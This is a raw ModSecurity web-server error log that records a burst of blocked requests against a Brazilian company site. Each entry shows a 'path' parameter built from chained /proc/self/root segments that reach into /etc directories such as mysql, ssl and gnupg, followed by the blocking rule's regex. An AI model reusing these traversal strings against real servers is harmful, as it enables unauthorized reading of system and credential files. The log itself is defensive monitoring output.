"PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgChrysWC90G-1nBrA23wAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:50.885157 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:52110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCho6lpbStxTqkSktgIgAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:51.759057 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:33566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgChwlT9VtDQc7bgUyeHQAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:52.323855 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:52116] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCiLABkC4fWIHEf8Hc9gAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:53.167370 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:33574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCibABkC4fWIHEf8Hc-QAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:53.779417 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:52124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCibABkC4fWIHEf8Hc-wAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:55.471577 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.241.46:52126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCi9SswJuvopo3lOhR7wAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:56.815025 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:52140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCjI6lpbStxTqkSktgJgAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:58.335570 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:44096] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCjv9ocpUE4ed4uDzfUwAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:00.604961 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.241.46:44100] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCkAlT9VtDQc7bgUyeIgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:01.997118 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:44112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCkXjZBu2q05ozVU9HkQAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:02.551485 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:33578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCko6lpbStxTqkSktgLQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:04.259337 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:44118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgClP9ocpUE4ed4uDzfVQAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:10.070363 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:59710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCmnbQATo66fKoS7w_UwAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:13.820113 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:37194] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCnbABkC4fWIHEf8HdDAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:15.155018 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:37208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCn46lpbStxTqkSktgLgAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:19.591068 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:37218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCowlT9VtDQc7bgUyeKgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:21.471910 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.241.46:44132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCpXbQATo66fKoS7w_ZgAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:16:24.775930 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:47504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCqLysWC90G-1nBrA25QAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:16:26.063349 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:47526] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCqpqj1wV0Si-OkefbAAAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:16:27.228696 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:53356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCq5qj1wV0Si-OkefbBAAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:27.447349 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.241.46:47538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCq3jZBu2q05ozVU9HlAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
